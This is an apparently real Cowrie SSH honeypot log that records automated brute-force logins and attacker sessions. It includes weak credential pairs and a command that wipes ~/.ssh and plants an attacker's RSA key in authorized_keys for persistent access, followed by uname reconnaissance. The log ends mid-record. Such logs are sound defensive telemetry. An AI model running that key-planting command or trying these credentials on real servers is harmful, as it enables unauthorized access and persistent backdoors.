{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:04:21.405483Z","src_ip":"212.227.235.229","session":"531a8cdfd2ee"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:04:21.406475Z","src_ip":"212.227.235.229","session":"531a8cdfd2ee"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:04:21.566527Z","src_ip":"212.227.235.229","session":"a6f10da7f858"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47292,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8df47a1d9dd","protocol":"ssh","message":"New connection: 212.227.125.160:47292 (1.2.3.4:22) [session: b8df47a1d9dd]","sensor":"my-vps","timestamp":"2025-08-31T05:04:21.581584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:04:21.582378Z","src_ip":"212.227.125.160","session":"b8df47a1d9dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:21.667168Z","src_ip":"212.227.235.229","session":"531a8cdfd2ee"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T05:04:21.833103Z","src_ip":"212.227.125.160","session":"b8df47a1d9dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48674,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea3c945bdaee","protocol":"ssh","message":"New connection: 212.227.235.229:48674 (1.2.3.4:22) [session: ea3c945bdaee]","sensor":"my-vps","timestamp":"2025-08-31T05:04:22.178387Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:04:22.245390Z","src_ip":"212.227.235.229","session":"531a8cdfd2ee"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:04:22.246064Z","src_ip":"212.227.235.229","session":"531a8cdfd2ee"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:04:23.034156Z","src_ip":"212.227.235.229","session":"531a8cdfd2ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:23.035117Z","src_ip":"212.227.235.229","session":"531a8cdfd2ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59618,"dst_ip":"1.2.3.4","dst_port":22,"session":"236d75e1e9de","protocol":"ssh","message":"New connection: 212.227.235.229:59618 (1.2.3.4:22) [session: 236d75e1e9de]","sensor":"my-vps","timestamp":"2025-08-31T05:04:23.295565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:04:23.296428Z","src_ip":"212.227.235.229","session":"236d75e1e9de"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:04:23.551260Z","src_ip":"212.227.235.229","session":"236d75e1e9de"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:04:24.619893Z","src_ip":"212.227.235.229","session":"236d75e1e9de"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:25.878931Z","src_ip":"212.227.235.229","session":"236d75e1e9de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59624,"dst_ip":"1.2.3.4","dst_port":22,"session":"b342358a2495","protocol":"ssh","message":"New connection: 212.227.235.229:59624 (1.2.3.4:22) [session: b342358a2495]","sensor":"my-vps","timestamp":"2025-08-31T05:04:26.145083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:04:26.146041Z","src_ip":"212.227.235.229","session":"b342358a2495"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:04:26.237783Z","src_ip":"212.227.235.229","session":"ea3c945bdaee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:04:26.238749Z","src_ip":"212.227.235.229","session":"ea3c945bdaee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:04:26.417536Z","src_ip":"212.227.235.229","session":"b342358a2495"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:04:27.543882Z","src_ip":"212.227.235.229","session":"b342358a2495"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:27.816901Z","src_ip":"212.227.235.229","session":"531a8cdfd2ee"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:27.817823Z","src_ip":"212.227.235.229","session":"b342358a2495"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:04:29.400048Z","src_ip":"212.227.235.229","session":"a6f10da7f858"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:04:29.400859Z","src_ip":"212.227.235.229","session":"a6f10da7f858"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:29.583106Z","src_ip":"212.227.125.160","session":"b8df47a1d9dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"4.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:34.286911Z","src_ip":"212.227.235.229","session":"a6f10da7f858"}
{"eventid":"cowrie.session.closed","duration":"91.6","message":"Connection lost after 91.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:34.288222Z","src_ip":"212.227.235.229","session":"a6f10da7f858"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39156,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6708ecb1bbb","protocol":"ssh","message":"New connection: 212.227.235.229:39156 (1.2.3.4:22) [session: d6708ecb1bbb]","sensor":"my-vps","timestamp":"2025-08-31T05:04:41.408338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:04:42.232929Z","src_ip":"212.227.235.229","session":"d6708ecb1bbb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:04:42.233986Z","src_ip":"212.227.235.229","session":"d6708ecb1bbb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T05:04:42.608117Z","src_ip":"212.227.235.229","session":"ea3c945bdaee"}
{"eventid":"cowrie.session.closed","duration":"21.6","message":"Connection lost after 21.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:43.800507Z","src_ip":"212.227.235.229","session":"ea3c945bdaee"}
{"eventid":"cowrie.login.failed","username":"server","password":"123456","message":"login attempt [server/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:04:48.250538Z","src_ip":"212.227.235.229","session":"d6708ecb1bbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53624,"dst_ip":"1.2.3.4","dst_port":22,"session":"8203896d8ab0","protocol":"ssh","message":"New connection: 212.227.235.229:53624 (1.2.3.4:22) [session: 8203896d8ab0]","sensor":"my-vps","timestamp":"2025-08-31T05:04:48.336481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:04:48.337411Z","src_ip":"212.227.235.229","session":"8203896d8ab0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:04:48.606957Z","src_ip":"212.227.235.229","session":"8203896d8ab0"}
{"eventid":"cowrie.login.failed","username":"mosquitto","password":"mosquitto","message":"login attempt [mosquitto/mosquitto] failed","sensor":"my-vps","timestamp":"2025-08-31T05:04:49.683234Z","src_ip":"212.227.235.229","session":"8203896d8ab0"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:50.114729Z","src_ip":"212.227.235.229","session":"d6708ecb1bbb"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:50.957208Z","src_ip":"212.227.235.229","session":"8203896d8ab0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58750,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c472bc7b1ce","protocol":"ssh","message":"New connection: 212.227.235.229:58750 (1.2.3.4:22) [session: 7c472bc7b1ce]","sensor":"my-vps","timestamp":"2025-08-31T05:04:53.422885Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:04:53.424107Z","src_ip":"212.227.235.229","session":"7c472bc7b1ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:04:53.696828Z","src_ip":"212.227.235.229","session":"7c472bc7b1ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42476,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5b3c81eb270","protocol":"ssh","message":"New connection: 212.227.125.160:42476 (1.2.3.4:22) [session: d5b3c81eb270]","sensor":"my-vps","timestamp":"2025-08-31T05:04:54.323960Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Qi123456.","message":"login attempt [root/Qi123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:04:54.829252Z","src_ip":"212.227.235.229","session":"7c472bc7b1ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:04:55.808436Z","src_ip":"212.227.235.229","session":"7c472bc7b1ce"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:04:55.809290Z","src_ip":"212.227.235.229","session":"7c472bc7b1ce"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:04:55.810039Z","src_ip":"212.227.235.229","session":"7c472bc7b1ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:56.084055Z","src_ip":"212.227.235.229","session":"7c472bc7b1ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47678,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd6454118334","protocol":"ssh","message":"New connection: 212.227.235.229:47678 (1.2.3.4:22) [session: dd6454118334]","sensor":"my-vps","timestamp":"2025-08-31T05:04:56.129506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:04:56.133563Z","src_ip":"212.227.235.229","session":"dd6454118334"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS